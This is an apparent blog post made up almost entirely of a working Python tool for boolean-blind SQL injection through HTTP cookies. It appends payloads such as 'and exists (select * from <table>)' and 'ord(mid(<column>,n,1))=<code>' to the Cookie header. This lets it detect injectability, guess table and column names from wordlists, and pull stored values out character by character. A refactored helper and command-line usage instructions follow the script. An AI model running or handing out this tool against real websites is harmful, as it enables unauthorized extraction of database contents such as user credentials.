import urllib.request
import urllib.parse
import urllib.error
import http.cookiejar
import argparse

# Example target: url = 'http://172.20.10.8/bug/cookie.php'
parser = argparse.ArgumentParser()
parser.add_argument('-u', help="-u http://localhost/cookie.php", type=str)
parser.add_argument('-cookie', help="-cookie id=xxx", type=str)
args = parser.parse_args()
url = args.u
cookie = args.cookie

grey = '''
*****************************************************

        SQL mysql_cookie injection tool
        Author: Grey_Network

*****************************************************
'''

print(grey)

# Boolean-based test payloads: if the cookie parameter is injectable,
# "and 1=1" should return the same page as the original request,
# while "and 1=2" should return a different one.
a = "%20and%201=1"
b = "%20and%201=2"

ua = ('Mozilla/5.0 (X11; Fedora; Linux x86_64) AppleWebKit/537.36 '
     '(KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36')

header  = {'User-Agent': ua, 'Referer': url, 'Cookie': cookie}
headera = {'User-Agent': ua, 'Referer': url, 'Cookie': cookie + a}
headerb = {'User-Agent': ua, 'Referer': url, 'Cookie': cookie + b}

# Fetch the baseline page, the "true" page and the "false" page
sqlurl = urllib.request.Request(url, headers=header)
sqlurl1 = urllib.request.urlopen(sqlurl).read()
sqla = urllib.request.Request(url, headers=headera)
sqla1 = urllib.request.urlopen(sqla).read()
sqlb = urllib.request.Request(url, headers=headerb)
sqlb1 = urllib.request.urlopen(sqlb).read()

# Injectable if the "and 1=1" page matches the baseline and the "and 1=2" page differs
if sqlurl1 == sqla1 and sqlurl1 != sqlb1:
    table = input("Scan for tables ? Y/n > ")
    dirt = "table.txt"
    webdirt = []
    # Load the table-name wordlist (stops at the first empty line)
    with open(dirt) as infile:
        while True:
            dirdict = infile.readline().strip()
            if len(dirdict) == 0:
                break
            webdirt.append(dirdict)
    if table == "y":
        # Guess table names with "and exists (select * from <table>)"
        for line in webdirt:
            headert = {
                'User-Agent': ua,
                'Referer': url,
                'Cookie': cookie + "%20and%20exists%20(select%20*%20from%20" + line + ")"
            }
            table_scan = urllib.request.Request(url, headers=headert)
            table_scan1 = urllib.request.urlopen(table_scan).read()
            if table_scan1 == sqla1 and table_scan1 != sqlb1:
                print("table:\n", line)

    column = input("Scan for columns ? Y/n > ")
    table_file = input("table > ")
    dirc = "column.txt"
    webdirc = []
    # Load the column-name wordlist (stops at the first empty line)
    with open(dirc) as infilec:
        while True:
            dirdicc = infilec.readline().strip()
            if len(dirdicc) == 0:
                break
            webdirc.append(dirdicc)
    if column == "y":
        # Guess column names with "and exists (select <column> from <table>)"
        for linec in webdirc:
            headerc = {
                'User-Agent': ua,
                'Referer': url,
                'Cookie': cookie + "%20and%20exists%20(select%20" + linec + "%20from%20" + table_file + ")"
            }
            column_scan = urllib.request.Request(url, headers=headerc)
            column_scan1 = urllib.request.urlopen(column_scan).read()
            if column_scan1 == sqla1 and column_scan1 != sqlb1:
                print("column:\n", linec)

    c1 = input("Start guessing the value ? Y/n > ")
    column_file = input("column > ")
    if c1 == "y":
        # First guess the length of the value with "and length(<column>)=N"
        o = 0
        while o < 100:
            o = o + 1
            oc = str(o)
            headerc1 = {
                'User-Agent': ua,
                'Referer': url,
                'Cookie': cookie + "%20and%20length(" + column_file + ")=" + oc
            }
            c1_scan = urllib.request.Request(url, headers=headerc1)
            c1_scan1 = urllib.request.urlopen(c1_scan).read()
            if c1_scan1 == sqla1 and c1_scan1 != sqlb1:
                # Then guess each character with "and ord(mid(<column>,pos,1))=<code>"
                ca1 = 0
                while ca1 < int(oc):
                    ca1 = ca1 + 1
                    cac1 = str(ca1)
                    ca2 = 0
                    while ca2 < 128:
                        ca2 = ca2 + 1
                        cac2 = str(ca2)
                        headerca1 = {
                            'User-Agent': ua,
                            'Referer': url,
                            'Cookie': cookie + "%20and%20ord(mid(" + column_file + "," + cac1 + ",1))=" + cac2
                        }
                        ca1_scan = urllib.request.Request(url, headers=headerca1)
                        ca1_scan1 = urllib.request.urlopen(ca1_scan).read()
                        if ca1_scan1 == sqla1 and ca1_scan1 != sqlb1:
                            data_dump = chr(int(cac2))
                            print(data_dump)
else:
    print("Unfortunately, this target is not injectable")
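Every step of the script repeats the same pattern: append a payload to the cookie, send the request, and compare the body against the "and 1=1" and "and 1=2" baselines. A minimal sketch of that core check factored into a helper, assuming the same urllib-based requests as above (the function and variable names here are my own, not from the original script):

import urllib.request

UA = ('Mozilla/5.0 (X11; Fedora; Linux x86_64) AppleWebKit/537.36 '
      '(KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36')

def fetch(url, cookie):
    # One GET request with the injected Cookie header; returns the raw body.
    req = urllib.request.Request(
        url, headers={'User-Agent': UA, 'Referer': url, 'Cookie': cookie})
    return urllib.request.urlopen(req).read()

def condition_is_true(url, cookie, payload, true_page, false_page):
    # Boolean-blind check: the injected condition is treated as true only when
    # the response matches the "and 1=1" baseline and differs from "and 1=2".
    body = fetch(url, cookie + payload)
    return body == true_page and body != false_page

# Hypothetical usage, with the two baselines already fetched as in the script
# above ("users" is just an example table name):
# condition_is_true(url, cookie, "%20and%20exists%20(select%20*%20from%20users)", sqla1, sqlb1)

For invocation, the script reads its target and cookie from the -u and -cookie flags defined above, for example python3 cookie_sqli.py -u http://localhost/cookie.php -cookie "id=1" (the filename cookie_sqli.py is an assumption; the post does not name the script). It also expects two plain-text wordlists next to it, table.txt and column.txt, with one candidate table or column name per line.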
Original article: https://www.cnblogs.com/grey-network/p/9021547.html